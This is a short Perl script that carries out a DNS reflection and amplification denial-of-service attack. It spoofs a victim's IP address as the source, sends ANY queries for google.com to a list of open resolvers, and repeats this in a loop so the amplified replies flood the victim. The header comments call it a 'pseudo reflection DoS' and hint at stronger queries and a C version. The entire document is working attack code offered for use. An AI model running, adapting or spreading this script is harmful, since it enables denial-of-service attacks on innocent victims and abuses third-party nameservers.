#!/usr/bin/perl ## fugi fugi@bl.org ## ns.list contains a list of nameservers that allow outside lookups ## this is a pseudo reflection DoS ## it requests an ANY record for google.com that is sent to victim ## this amplifies what the attacker sent ## there are other queries that can greatly amplify. no I'm not telling. ## this is just concept scripting, C code is comming now that it works. use Net::DNS::Resolver; use Net::RawIP; open(LIST,"ns.list"); @list=; close LIST; chomp(@list); my $lnum=@list; my $i=0; my $loop=0; if ($ARGV[0] eq '') { print "Usage: ./ihateperl.pl \n"; exit(0); } while($loop < $ARGV[1]) { while($i < $lnum) { my $source = $ARGV[0]; my $dnspkt = new Net::DNS::Packet("google.com","ANY"); my $pktdata = $dnspkt->data; my $sock = new Net::RawIP({udp=>{}}); $sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} }); $sock->send; $i++; }$loop++; $i=0;} exit(0);